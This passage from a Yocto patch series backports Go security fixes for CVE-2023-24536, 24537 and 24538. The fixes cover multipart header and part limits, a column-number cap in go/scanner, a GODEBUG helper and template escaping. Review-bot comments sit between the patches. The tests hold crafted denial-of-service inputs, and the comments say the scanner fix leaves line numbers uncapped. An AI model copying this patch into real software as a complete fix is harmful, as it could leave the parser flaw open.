84@@ -87,13 +97,17 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
85 }
86 var copyBuf []byte
87 for {
88- p, err := r.nextPart(false, maxMemoryBytes)
89+ p, err := r.nextPart(false, maxMemoryBytes, maxHeaders)
90 if err == io.EOF {
91 break
92 }
93 if err != nil {
94 return nil, err
95 }
96+ if maxParts <= 0 {
97+ return nil, ErrMessageTooLarge
98+ }
99+ maxParts--
100
101 name := p.FormName()
102 if name == "" {
103@@ -137,6 +151,9 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
104 if maxMemoryBytes < 0 {
105 return nil, ErrMessageTooLarge
106 }
107+ for _, v := range p.Header {
108+ maxHeaders -= int64(len(v))
109+ }
110 fh := &FileHeader{
111 Filename: filename,
112 Header: p.Header,
113diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
114index 8ed26e0..c78eeb7 100644
115--- a/src/mime/multipart/formdata_test.go
116+++ b/src/mime/multipart/formdata_test.go
117@@ -360,6 +360,67 @@ func testReadFormManyFiles(t *testing.T, distinct bool) {
118 }
119 }
120
121+func TestReadFormLimits(t *testing.T) {
122+ for _, test := range []struct {
123+ values int
124+ files int
125+ extraKeysPerFile int
126+ wantErr error
127+ godebug string
128+ }{
129+ {values: 1000},
130+ {values: 1001, wantErr: ErrMessageTooLarge},
131+ {values: 500, files: 500},
132+ {values: 501, files: 500, wantErr: ErrMessageTooLarge},
133+ {files: 1000},
134+ {files: 1001, wantErr: ErrMessageTooLarge},
135+ {files: 1, extraKeysPerFile: 9998}, // plus Content-Disposition and Content-Type
136+ {files: 1, extraKeysPerFile: 10000, wantErr: ErrMessageTooLarge},
137+ {godebug: "multipartmaxparts=100", values: 100},
138+ {godebug: "multipartmaxparts=100", values: 101, wantErr: ErrMessageTooLarge},
139+ {godebug: "multipartmaxheaders=100", files: 2, extraKeysPerFile: 48},
140+ {godebug: "multipartmaxheaders=100", files: 2, extraKeysPerFile: 50, wantErr: ErrMessageTooLarge},
141+ } {
142+ name := fmt.Sprintf("values=%v/files=%v/extraKeysPerFile=%v", test.values, test.files, test.extraKeysPerFile)
143+ if test.godebug != "" {
144+ name += fmt.Sprintf("/godebug=%v", test.godebug)
145+ }
146+ t.Run(name, func(t *testing.T) {
147+ if test.godebug != "" {
148+ t.Setenv("GODEBUG", test.godebug)
149+ }
150+ var buf bytes.Buffer
151+ fw := NewWriter(&buf)
152+ for i := 0; i < test.values; i++ {
153+ w, _ := fw.CreateFormField(fmt.Sprintf("field%v", i))
154+ fmt.Fprintf(w, "value %v", i)
155+ }
156+ for i := 0; i < test.files; i++ {
157+ h := make(textproto.MIMEHeader)
158+ h.Set("Content-Disposition",
159+ fmt.Sprintf(`form-data; name="file%v"; filename="file%v"`, i, i))
160+ h.Set("Content-Type", "application/octet-stream")
161+ for j := 0; j < test.extraKeysPerFile; j++ {
162+ h.Set(fmt.Sprintf("k%v", j), "v")
163+ }
164+ w, _ := fw.CreatePart(h)
165+ fmt.Fprintf(w, "value %v", i)
166+ }
167+ if err := fw.Close(); err != nil {
168+ t.Fatal(err)
169+ }
170+ fr := NewReader(bytes.NewReader(buf.Bytes()), fw.Boundary())
171+ form, err := fr.ReadForm(1 << 10)
172+ if err == nil {
173+ defer form.RemoveAll()
174+ }
175+ if err != test.wantErr {
176+ t.Errorf("ReadForm = %v, want %v", err, test.wantErr)
177+ }
178+ })
179+ }
180+}
181+
182 func BenchmarkReadForm(b *testing.B) {
183 for _, test := range []struct {
184 name string
185diff --git a/src/mime/multipart/multipart.go b/src/mime/multipart/multipart.go
186index 958cef8..94464a8 100644
187--- a/src/mime/multipart/multipart.go
188+++ b/src/mime/multipart/multipart.go
189@@ -16,11 +16,13 @@ import (
190 "bufio"
191 "bytes"
192 "fmt"
193+ "internal/godebug"
194 "io"
195 "io/ioutil"
196 "mime"
197 "mime/quotedprintable"
198 "net/textproto"
199+ "strconv"
200 "strings"
201 )
202
203@@ -121,12 +123,12 @@ func (r *stickyErrorReader) Read(p []byte) (n int, _ error) {
204 return n, r.err
205 }
206
207-func newPart(mr *Reader, rawPart bool, maxMIMEHeaderSize int64) (*Part, error) {
208+func newPart(mr *Reader, rawPart bool, maxMIMEHeaderSize, maxMIMEHeaders int64) (*Part, error) {
209 bp := &Part{
210 Header: make(map[string][]string),
211 mr: mr,
212 }
213- if err := bp.populateHeaders(maxMIMEHeaderSize); err != nil {
214+ if err := bp.populateHeaders(maxMIMEHeaderSize, maxMIMEHeaders); err != nil {
215 return nil, err
216 }
217 bp.r = partReader{bp}
218@@ -142,9 +144,9 @@ func newPart(mr *Reader, rawPart bool, maxMIMEHeaderSize int64) (*Part, error) {
219 return bp, nil
220 }
221
222-func (bp *Part) populateHeaders(maxMIMEHeaderSize int64) error {
223+func (bp *Part) populateHeaders(maxMIMEHeaderSize, maxMIMEHeaders int64) error {
224 r := textproto.NewReader(bp.mr.bufReader)
225- header, err := readMIMEHeader(r, maxMIMEHeaderSize)
226+ header, err := readMIMEHeader(r, maxMIMEHeaderSize, maxMIMEHeaders)
227 if err == nil {
228 bp.Header = header
229 }
230@@ -306,6 +308,19 @@ type Reader struct {
231 // including header keys, values, and map overhead.
232 const maxMIMEHeaderSize = 10 << 20
233
234+func maxMIMEHeaders() int64 {
235+ // multipartMaxHeaders is the maximum number of header entries NextPart will return,
236+ // as well as the maximum combined total of header entries Reader.ReadForm will return
237+ // in FileHeaders.
238+ multipartMaxHeaders := godebug.Get("multipartmaxheaders")
239+ if multipartMaxHeaders != "" {
240+ if v, err := strconv.ParseInt(multipartMaxHeaders, 10, 64); err == nil && v >= 0 {
241+ return v
242+ }
243+ }
244+ return 10000
245+}
246+
247 // NextPart returns the next part in the multipart or an error.
248 // When there are no more parts, the error io.EOF is returned.
249 //
250@@ -313,7 +328,7 @@ const maxMIMEHeaderSize = 10 << 20
251 // has a value of "quoted-printable", that header is instead
252 // hidden and the body is transparently decoded during Read calls.
253 func (r *Reader) NextPart() (*Part, error) {
254- return r.nextPart(false, maxMIMEHeaderSize)
255+ return r.nextPart(false, maxMIMEHeaderSize, maxMIMEHeaders())
256 }
257
258 // NextRawPart returns the next part in the multipart or an error.
259@@ -322,10 +337,10 @@ func (r *Reader) NextPart() (*Part, error) {
260 // Unlike NextPart, it does not have special handling for
261 // "Content-Transfer-Encoding: quoted-printable".
262 func (r *Reader) NextRawPart() (*Part, error) {
263- return r.nextPart(true, maxMIMEHeaderSize)
264+ return r.nextPart(true, maxMIMEHeaderSize, maxMIMEHeaders())
265 }
266
267-func (r *Reader) nextPart(rawPart bool, maxMIMEHeaderSize int64) (*Part, error) {
268+func (r *Reader) nextPart(rawPart bool, maxMIMEHeaderSize, maxMIMEHeaders int64) (*Part, error) {
269 if r.currentPart != nil {
270 r.currentPart.Close()
271 }
272@@ -350,7 +365,7 @@ func (r *Reader) nextPart(rawPart bool, maxMIMEHeaderSize int64) (*Part, error)
273
274 if r.isBoundaryDelimiterLine(line) {
275 r.partsRead++
276- bp, err := newPart(r, rawPart, maxMIMEHeaderSize)
277+ bp, err := newPart(r, rawPart, maxMIMEHeaderSize, maxMIMEHeaders)
278 if err != nil {
279 return nil, err
280 }
281diff --git a/src/mime/multipart/readmimeheader.go b/src/mime/multipart/readmimeheader.go
282index 6836928..25aa6e2 100644
283--- a/src/mime/multipart/readmimeheader.go
284+++ b/src/mime/multipart/readmimeheader.go
285@@ -11,4 +11,4 @@ import (
286 // readMIMEHeader is defined in package net/textproto.
287 //
288 //go:linkname readMIMEHeader net/textproto.readMIMEHeader
289-func readMIMEHeader(r *textproto.Reader, lim int64) (textproto.MIMEHeader, error)
290+func readMIMEHeader(r *textproto.Reader, maxMemory, maxHeaders int64) (textproto.MIMEHeader, error)
291diff --git a/src/net/textproto/reader.go b/src/net/textproto/reader.go
292index 1c79f0a..ad2d777 100644
293--- a/src/net/textproto/reader.go
294+++ b/src/net/textproto/reader.go
295@@ -484,12 +484,12 @@ func (r *Reader) ReadDotLines() ([]string, error) {
296 // }
297 //
298 func (r *Reader) ReadMIMEHeader() (MIMEHeader, error) {
299- return readMIMEHeader(r, math.MaxInt64)
300+ return readMIMEHeader(r, math.MaxInt64, math.MaxInt64)
301 }
302
303 // readMIMEHeader is a version of ReadMIMEHeader which takes a limit on the header size.
304 // It is called by the mime/multipart package.
305-func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
306+func readMIMEHeader(r *Reader, maxMemory, maxHeaders int64) (MIMEHeader, error) {
307 // Avoid lots of small slice allocations later by allocating one
308 // large one ahead of time which we'll cut up into smaller
309 // slices. If this isn't big enough later, we allocate small ones.
310@@ -507,7 +507,7 @@ func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
311 // Account for 400 bytes of overhead for the MIMEHeader, plus 200 bytes per entry.
312 // Benchmarking map creation as of go1.20, a one-entry MIMEHeader is 416 bytes and large
313 // MIMEHeaders average about 200 bytes per entry.
314- lim -= 400
315+ maxMemory -= 400
316 const mapEntryOverhead = 200
317
318 // The first line cannot start with a leading space.
319@@ -539,6 +539,11 @@ func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
320 continue
321 }
322
323+ maxHeaders--
324+ if maxHeaders < 0 {
325+ return nil, errors.New("message too large")
326+ }
327+
328 // backport 5c55ac9bf1e5f779220294c843526536605f42ab
329 //
330 // value is computed as
331@@ -557,11 +562,11 @@ func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
332
333 vv := m[key]
334 if vv == nil {
335- lim -= int64(len(key))
336- lim -= mapEntryOverhead
337+ maxMemory -= int64(len(key))
338+ maxMemory -= mapEntryOverhead
339 }
340- lim -= int64(len(value))
341- if lim < 0 {
342+ maxMemory -= int64(len(value))
343+ if maxMemory < 0 {
344 // TODO: This should be a distinguishable error (ErrMessageTooLarge)
345 // to allow mime/multipart to detect it.
346 return m, errors.New("message too large")
347--
3482.25.1
349
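Review bot: `t.Setenv("GODEBUG", test.godebug)` in the new TestReadFormLimits relies on testing.T.Setenv, which was added in Go 1.17, while this patch is placed under go-1.14. If that is the toolchain being patched, formdata_test.go will not compile and the regression test for the new part and header limits cannot run. A version-neutral form is `old := os.Getenv("GODEBUG")`, `os.Setenv("GODEBUG", test.godebug)`, `defer os.Setenv("GODEBUG", old)`, assuming the test file imports os (its import block is not in the hunk). Separately, the new header-count check in readMIMEHeader returns a fresh `errors.New("message too large")` while the test expects ErrMessageTooLarge, so the mapping presumably depends on a string match outside these hunks; worth confirming it exists in the tree being patched.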
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24537.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24537.patch
new file mode 100644
index 0000000000..e04b717fc1
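--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24537.patch
@@ -0,0 +1,76 @@
+From bf8c7c575c8a552d9d79deb29e80854dc88528d0 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Mon, 20 Mar 2023 10:43:19 -0700
+Subject: [PATCH] [release-branch.go1.20] mime/multipart: limit parsed mime
+ message sizes
+
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802456
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Run-TryBot: Damien Neil <dneil@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802611
+Reviewed-by: Damien Neil <dneil@google.com>
+Change-Id: Ifdfa192d54f722d781a4d8c5f35b5fb72d122168
+Reviewed-on: https://go-review.googlesource.com/c/go/+/481986
+Reviewed-by: Matthew Dempsky <mdempsky@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Michael Knyszek <mknyszek@google.com>
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/126a1d02da82f93ede7ce0bd8d3c51ef627f2104]
+CVE: CVE-2023-24537
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/go/parser/parser_test.go | 16 ++++++++++++++++
+ src/go/scanner/scanner.go | 5 ++++-
+ 2 files changed, 20 insertions(+), 1 deletion(-)
+
+diff --git a/src/go/parser/parser_test.go b/src/go/parser/parser_test.go
+index 37a6a2b..714557c 100644
+--- a/src/go/parser/parser_test.go
++++ b/src/go/parser/parser_test.go
+@@ -738,3 +738,19 @@ func TestScopeDepthLimit(t *testing.T) {
+ }
+ }
+ }
++
++// TestIssue59180 tests that line number overflow doesn't cause an infinite loop.
++func TestIssue59180(t *testing.T) {
++ testcases := []string{
++ "package p\n//line :9223372036854775806\n\n//",
++ "package p\n//line :1:9223372036854775806\n\n//",
++ "package p\n//line file:9223372036854775806\n\n//",
++ }
++
++ for _, src := range testcases {
++ _, err := ParseFile(token.NewFileSet(), "", src, ParseComments)
++ if err == nil {
++ t.Errorf("ParseFile(%s) succeeded unexpectedly", src)
++ }
++ }
++}
+diff --git a/src/go/scanner/scanner.go b/src/go/scanner/scanner.go
+index 00fe2dc..3159d25 100644
+--- a/src/go/scanner/scanner.go
++++ b/src/go/scanner/scanner.go
+@@ -246,13 +246,16 @@ func (s *Scanner) updateLineInfo(next, offs int, text []byte) {
+ return
+ }
+
++ // Put a cap on the maximum size of line and column numbers.
++ // 30 bits allows for some additional space before wrapping an int32.
++ const maxLineCol = 1<<30 - 1
+ var line, col int
+ i2, n2, ok2 := trailingDigits(text[:i-1])
+ if ok2 {
+ //line filename:line:col
+ i, i2 = i2, i
+ line, col = n2, n
+- if col == 0 {
++ if col == 0 || col > maxLineCol {
+ s.error(offs+i2, "invalid column number: "+string(text[i2:]))
+ return
+ }
+--
+2.25.1
+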
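Review bot: Only the column is capped in updateLineInfo: the hunk changes `if col == 0` to `if col == 0 || col > maxLineCol`, but no visible line compares `line` with maxLineCol. The new comment speaks of line and column numbers, and two of the three TestIssue59180 inputs (`//line :9223372036854775806` and `//line file:9223372036854775806`) overflow the line number rather than the column. The diffstat (scanner.go: 4 insertions, 1 deletion) matches the single visible hunk, so there is no second change in this file. The line-number check that presumably follows this block, outside the hunk, needs the same bound, e.g. `if line == 0 || line > maxLineCol {`; without it those two inputs are not rejected by anything this patch adds. The Subject line also still reads "mime/multipart: limit parsed mime message sizes", which does not describe a go/scanner change.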
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24538-1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538-1.patch
new file mode 100644
index 0000000000..23c5075e41
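--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538-1.patch
@@ -0,0 +1,125 @@
+From 8acd01094d9ee17f6e763a61e49a8a808b3a9ddb Mon Sep 17 00:00:00 2001
+From: Brad Fitzpatrick <bradfitz@golang.org>
+Date: Mon, 2 Aug 2021 14:55:51 -0700
+Subject: [PATCH 1/6] net/netip: add new IP address package
+
+Co-authored-by: Alex Willmer <alex@moreati.org.uk> (GitHub @moreati)
+Co-authored-by: Alexander Yastrebov <yastrebov.alex@gmail.com>
+Co-authored-by: David Anderson <dave@natulte.net> (Tailscale CLA)
+Co-authored-by: David Crawshaw <crawshaw@tailscale.com> (Tailscale CLA)
+Co-authored-by: Dmytro Shynkevych <dmytro@tailscale.com> (Tailscale CLA)
+Co-authored-by: Elias Naur <mail@eliasnaur.com>
+Co-authored-by: Joe Tsai <joetsai@digital-static.net> (Tailscale CLA)
+Co-authored-by: Jonathan Yu <jawnsy@cpan.org> (GitHub @jawnsy)
+Co-authored-by: Josh Bleecher Snyder <josharian@gmail.com> (Tailscale CLA)
+Co-authored-by: Maisem Ali <maisem@tailscale.com> (Tailscale CLA)
+Co-authored-by: Manuel Mendez (Go AUTHORS mmendez534@...)
+Co-authored-by: Matt Layher <mdlayher@gmail.com>
+Co-authored-by: Noah Treuhaft <noah.treuhaft@gmail.com> (GitHub @nwt)
+Co-authored-by: Stefan Majer <stefan.majer@gmail.com>
+Co-authored-by: Terin Stock <terinjokes@gmail.com> (Cloudflare CLA)
+Co-authored-by: Tobias Klauser <tklauser@distanz.ch>
+
+Fixes #46518
+
+Change-Id: I0041f9e1115d61fa6e95fcf32b01d9faee708712
+Reviewed-on: https://go-review.googlesource.com/c/go/+/339309
+Run-TryBot: Brad Fitzpatrick <bradfitz@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Russ Cox <rsc@golang.org>
+Trust: Brad Fitzpatrick <bradfitz@golang.org>
+
+Dependency Patch #1
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/a59e33224e42d60a97fa720a45e1b74eb6aaa3d0
+CVE: CVE-2023-24538
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/internal/godebug/godebug.go | 34 ++++++++++++++++++++++++++++++++++
+ src/internal/godebug/godebug_test.go | 34 ++++++++++++++++++++++++++++++++++
+ 2 files changed, 68 insertions(+)
+ create mode 100644 src/internal/godebug/godebug.go
+ create mode 100644 src/internal/godebug/godebug_test.go
+
+diff --git a/src/internal/godebug/godebug.go b/src/internal/godebug/godebug.go
+new file mode 100644
+index 0000000..ac434e5
+--- /dev/null
++++ b/src/internal/godebug/godebug.go
+@@ -0,0 +1,34 @@
++// Copyright 2021 The Go Authors. All rights reserved.
++// Use of this source code is governed by a BSD-style
++// license that can be found in the LICENSE file.
++
++// Package godebug parses the GODEBUG environment variable.
++package godebug
++
++import "os"
++
++// Get returns the value for the provided GODEBUG key.
++func Get(key string) string {
++ return get(os.Getenv("GODEBUG"), key)
++}
++
++// get returns the value part of key=value in s (a GODEBUG value).
++func get(s, key string) string {
++ for i := 0; i < len(s)-len(key)-1; i++ {
++ if i > 0 && s[i-1] != ',' {
++ continue
++ }
++ afterKey := s[i+len(key):]
++ if afterKey[0] != '=' || s[i:i+len(key)] != key {
++ continue
++ }
++ val := afterKey[1:]
++ for i, b := range val {
++ if b == ',' {
++ return val[:i]
++ }
++ }
++ return val
++ }
++ return ""
++}
+diff --git a/src/internal/godebug/godebug_test.go b/src/internal/godebug/godebug_test.go
+new file mode 100644
+index 0000000..41b9117
+--- /dev/null
++++ b/src/internal/godebug/godebug_test.go
+@@ -0,0 +1,34 @@
++// Copyright 2021 The Go Authors. All rights reserved.
++// Use of this source code is governed by a BSD-style
++// license that can be found in the LICENSE file.
++
++package godebug
++
++import "testing"
++
++func TestGet(t *testing.T) {
++ tests := []struct {
++ godebug string
++ key string
++ want string
++ }{
++ {"", "", ""},
++ {"", "foo", ""},
++ {"foo=bar", "foo", "bar"},
++ {"foo=bar,after=x", "foo", "bar"},
++ {"before=x,foo=bar,after=x", "foo", "bar"},
++ {"before=x,foo=bar", "foo", "bar"},
++ {",,,foo=bar,,,", "foo", "bar"},
++ {"foodecoy=wrong,foo=bar", "foo", "bar"},
++ {"foo=", "foo", ""},
++ {"foo", "foo", ""},
++ {",foo", "foo", ""},
++ {"foo=bar,baz", "loooooooong", ""},
++ }
++ for _, tt := range tests {
++ got := get(tt.godebug, tt.key)
++ if got != tt.want {
++ t.Errorf("get(%q, %q) = %q; want %q", tt.godebug, tt.key, got, tt.want)
++ }
++ }
++}
+--
+2.7.4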
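Review bot: The patch header describes a different change than the diff delivers: the Subject and co-author list are those of the upstream net/netip commit, but the diffstat shows only src/internal/godebug/godebug.go and godebug_test.go being created. This helper is what the multipart limits read their GODEBUG overrides through (`godebug.Get("multipartmaxparts")` in CVE-2023-24536_3.patch), so the partial backport should be stated in the header for anyone auditing the CVE fixes. A line under "Dependency Patch #1" such as `Only src/internal/godebug is taken from the upstream commit; net/netip itself is not backported.` would do. The doc comment on get could also gain `// It returns "" both when key is absent and when its value is empty.`, which the test table (`{"foo=", "foo", ""}`, `{"", "foo", ""}`) already pins.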
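--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538-2.patch
@@ -0,0 +1,635 @@
+From 6fc21505614f36178df0dad7034b6b8e3f7588d5 Mon Sep 17 00:00:00 2001
+From: empijei <robclap8@gmail.com>
+Date: Fri, 27 Mar 2020 19:27:55 +0100
+Subject: [PATCH 2/6] html/template,text/template: switch to Unicode escapes
+ for JSON compatibility
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The existing implementation is not compatible with JSON
+escape as it uses hex escaping.
+Unicode escape, instead, is valid for both JSON and JS.
+This fix avoids creating a separate escaping context for
+scripts of type "application/ld+json" and it is more
+future-proof in case more JSON+JS contexts get added
+to the platform (e.g. import maps).
+
+Fixes #33671
+Fixes #37634
+
+Change-Id: Id6f6524b4abc52e81d9d744d46bbe5bf2e081543
+Reviewed-on: https://go-review.googlesource.com/c/go/+/226097
+Reviewed-by: Carl Johnson <me@carlmjohnson.net>
+Reviewed-by: Daniel Martí <mvdan@mvdan.cc>
+Run-TryBot: Daniel Martí <mvdan@mvdan.cc>
+TryBot-Result: Gobot Gobot <gobot@golang.org>
+
+Dependency Patch #2
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/d4d298040d072ddacea0e0d6b55fb148fff18070
+CVE: CVE-2023-24538
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/html/template/content_test.go | 70 +++++++++++++++++++-------------------
+ src/html/template/escape_test.go | 6 ++--
+ src/html/template/example_test.go | 6 ++--
+ src/html/template/js.go | 70 +++++++++++++++++++++++---------------
+ src/html/template/js_test.go | 68 ++++++++++++++++++------------------
+ src/html/template/template_test.go | 39 +++++++++++++++++++++
+ src/text/template/exec_test.go | 6 ++--
+ src/text/template/funcs.go | 8 ++---
+ 8 files changed, 163 insertions(+), 110 deletions(-)
+
+diff --git a/src/html/template/content_test.go b/src/html/template/content_test.go
+index 72d56f5..bd86527 100644
+--- a/src/html/template/content_test.go
++++ b/src/html/template/content_test.go
+@@ -18,7 +18,7 @@ func TestTypedContent(t *testing.T) {
+ HTML(`Hello, <b>World</b> &amp;tc!`),
+ HTMLAttr(` dir="ltr"`),
+ JS(`c && alert("Hello, World!");`),
+- JSStr(`Hello, World & O'Reilly\x21`),
++ JSStr(`Hello, World & O'Reilly\u0021`),
+ URL(`greeting=H%69,&addressee=(World)`),
+ Srcset(`greeting=H%69,&addressee=(World) 2x, https://golang.org/favicon.ico 500.5w`),
+ URL(`,foo/,`),
+@@ -70,7 +70,7 @@ func TestTypedContent(t *testing.T) {
+ `Hello, <b>World</b> &amp;tc!`,
+ ` dir=&#34;ltr&#34;`,
+ `c &amp;&amp; alert(&#34;Hello, World!&#34;);`,
+- `Hello, World &amp; O&#39;Reilly\x21`,
++ `Hello, World &amp; O&#39;Reilly\u0021`,
+ `greeting=H%69,&amp;addressee=(World)`,
+ `greeting=H%69,&amp;addressee=(World) 2x, https://golang.org/favicon.ico 500.5w`,
+ `,foo/,`,
+@@ -100,7 +100,7 @@ func TestTypedContent(t *testing.T) {
+ `Hello,&#32;World&#32;&amp;tc!`,
+ `&#32;dir&#61;&#34;ltr&#34;`,
+ `c&#32;&amp;&amp;&#32;alert(&#34;Hello,&#32;World!&#34;);`,
+- `Hello,&#32;World&#32;&amp;&#32;O&#39;Reilly\x21`,
++ `Hello,&#32;World&#32;&amp;&#32;O&#39;Reilly\u0021`,
+ `greeting&#61;H%69,&amp;addressee&#61;(World)`,
+ `greeting&#61;H%69,&amp;addressee&#61;(World)&#32;2x,&#32;https://golang.org/favicon.ico&#32;500.5w`,
+ `,foo/,`,
+@@ -115,7 +115,7 @@ func TestTypedContent(t *testing.T) {
+ `Hello, World &amp;tc!`,
+ ` dir=&#34;ltr&#34;`,
+ `c &amp;&amp; alert(&#34;Hello, World!&#34;);`,
+- `Hello, World &amp; O&#39;Reilly\x21`,
++ `Hello, World &amp; O&#39;Reilly\u0021`,
+ `greeting=H%69,&amp;addressee=(World)`,
+ `greeting=H%69,&amp;addressee=(World) 2x, https://golang.org/favicon.ico 500.5w`,
+ `,foo/,`,
+@@ -130,7 +130,7 @@ func TestTypedContent(t *testing.T) {
+ `Hello, &lt;b&gt;World&lt;/b&gt; &amp;tc!`,
+ ` dir=&#34;ltr&#34;`,
+ `c &amp;&amp; alert(&#34;Hello, World!&#34;);`,
+- `Hello, World &amp; O&#39;Reilly\x21`,
++ `Hello, World &amp; O&#39;Reilly\u0021`,
+ `greeting=H%69,&amp;addressee=(World)`,
+ `greeting=H%69,&amp;addressee=(World) 2x, https://golang.org/favicon.ico 500.5w`,
+ `,foo/,`,
+@@ -146,7 +146,7 @@ func TestTypedContent(t *testing.T) {
+ // Not escaped.
+ `c && alert("Hello, World!");`,
+ // Escape sequence not over-escaped.
+- `"Hello, World & O'Reilly\x21"`,
++ `"Hello, World & O'Reilly\u0021"`,
+ `"greeting=H%69,\u0026addressee=(World)"`,
+ `"greeting=H%69,\u0026addressee=(World) 2x, https://golang.org/favicon.ico 500.5w"`,
+ `",foo/,"`,
+@@ -162,7 +162,7 @@ func TestTypedContent(t *testing.T) {
+ // Not JS escaped but HTML escaped.
+ `c &amp;&amp; alert(&#34;Hello, World!&#34;);`,
+ // Escape sequence not over-escaped.
+- `&#34;Hello, World &amp; O&#39;Reilly\x21&#34;`,
++ `&#34;Hello, World &amp; O&#39;Reilly\u0021&#34;`,
+ `&#34;greeting=H%69,\u0026addressee=(World)&#34;`,
+ `&#34;greeting=H%69,\u0026addressee=(World) 2x, https://golang.org/favicon.ico 500.5w&#34;`,
+ `&#34;,foo/,&#34;`,
+@@ -171,30 +171,30 @@ func TestTypedContent(t *testing.T) {
+ {
+ `<script>alert("{{.}}")</script>`,
+ []string{
+- `\x3cb\x3e \x22foo%\x22 O\x27Reilly \x26bar;`,
+- `a[href =~ \x22\/\/example.com\x22]#foo`,
+- `Hello, \x3cb\x3eWorld\x3c\/b\x3e \x26amp;tc!`,
+- ` dir=\x22ltr\x22`,
+- `c \x26\x26 alert(\x22Hello, World!\x22);`,
++ `\u003cb\u003e \u0022foo%\u0022 O\u0027Reilly \u0026bar;`,
++ `a[href =~ \u0022\/\/example.com\u0022]#foo`,
++ `Hello, \u003cb\u003eWorld\u003c\/b\u003e \u0026amp;tc!`,
++ ` dir=\u0022ltr\u0022`,
++ `c \u0026\u0026 alert(\u0022Hello, World!\u0022);`,
+ // Escape sequence not over-escaped.
+- `Hello, World \x26 O\x27Reilly\x21`,
+- `greeting=H%69,\x26addressee=(World)`,
+- `greeting=H%69,\x26addressee=(World) 2x, https:\/\/golang.org\/favicon.ico 500.5w`,
++ `Hello, World \u0026 O\u0027Reilly\u0021`,
++ `greeting=H%69,\u0026addressee=(World)`,
++ `greeting=H%69,\u0026addressee=(World) 2x, https:\/\/golang.org\/favicon.ico 500.5w`,
+ `,foo\/,`,
+ },
+ },
+ {
+ `<script type="text/javascript">alert("{{.}}")</script>`,
+ []string{
+- `\x3cb\x3e \x22foo%\x22 O\x27Reilly \x26bar;`,
+- `a[href =~ \x22\/\/example.com\x22]#foo`,
+- `Hello, \x3cb\x3eWorld\x3c\/b\x3e \x26amp;tc!`,
+- ` dir=\x22ltr\x22`,
+- `c \x26\x26 alert(\x22Hello, World!\x22);`,
++ `\u003cb\u003e \u0022foo%\u0022 O\u0027Reilly \u0026bar;`,
++ `a[href =~ \u0022\/\/example.com\u0022]#foo`,
++ `Hello, \u003cb\u003eWorld\u003c\/b\u003e \u0026amp;tc!`,
++ ` dir=\u0022ltr\u0022`,
++ `c \u0026\u0026 alert(\u0022Hello, World!\u0022);`,
+ // Escape sequence not over-escaped.
+- `Hello, World \x26 O\x27Reilly\x21`,
+- `greeting=H%69,\x26addressee=(World)`,
+- `greeting=H%69,\x26addressee=(World) 2x, https:\/\/golang.org\/favicon.ico 500.5w`,
++ `Hello, World \u0026 O\u0027Reilly\u0021`,
++ `greeting=H%69,\u0026addressee=(World)`,
++ `greeting=H%69,\u0026addressee=(World) 2x, https:\/\/golang.org\/favicon.ico 500.5w`,
+ `,foo\/,`,
+ },
+ },
+@@ -208,7 +208,7 @@ func TestTypedContent(t *testing.T) {
+ // Not escaped.
+ `c && alert("Hello, World!");`,
+ // Escape sequence not over-escaped.
+- `"Hello, World & O'Reilly\x21"`,
++ `"Hello, World & O'Reilly\u0021"`,
+ `"greeting=H%69,\u0026addressee=(World)"`,
+ `"greeting=H%69,\u0026addressee=(World) 2x, https://golang.org/favicon.ico 500.5w"`,
+ `",foo/,"`,
+@@ -224,7 +224,7 @@ func TestTypedContent(t *testing.T) {
+ `Hello, <b>World</b> &amp;tc!`,
+ ` dir=&#34;ltr&#34;`,
+ `c &amp;&amp; alert(&#34;Hello, World!&#34;);`,
+- `Hello, World &amp; O&#39;Reilly\x21`,
++ `Hello, World &amp; O&#39;Reilly\u0021`,
+ `greeting=H%69,&amp;addressee=(World)`,
+ `greeting=H%69,&amp;addressee=(World) 2x, https://golang.org/favicon.ico 500.5w`,
+ `,foo/,`,
+@@ -233,15 +233,15 @@ func TestTypedContent(t *testing.T) {
+ {
+ `<button onclick='alert("{{.}}")'>`,
+ []string{
+- `\x3cb\x3e \x22foo%\x22 O\x27Reilly \x26bar;`,
+- `a[href =~ \x22\/\/example.com\x22]#foo`,
+- `Hello, \x3cb\x3eWorld\x3c\/b\x3e \x26amp;tc!`,
+- ` dir=\x22ltr\x22`,
+- `c \x26\x26 alert(\x22Hello, World!\x22);`,
++ `\u003cb\u003e \u0022foo%\u0022 O\u0027Reilly \u0026bar;`,
++ `a[href =~ \u0022\/\/example.com\u0022]#foo`,
++ `Hello, \u003cb\u003eWorld\u003c\/b\u003e \u0026amp;tc!`,
++ ` dir=\u0022ltr\u0022`,
++ `c \u0026\u0026 alert(\u0022Hello, World!\u0022);`,
+ // Escape sequence not over-escaped.
+- `Hello, World \x26 O\x27Reilly\x21`,
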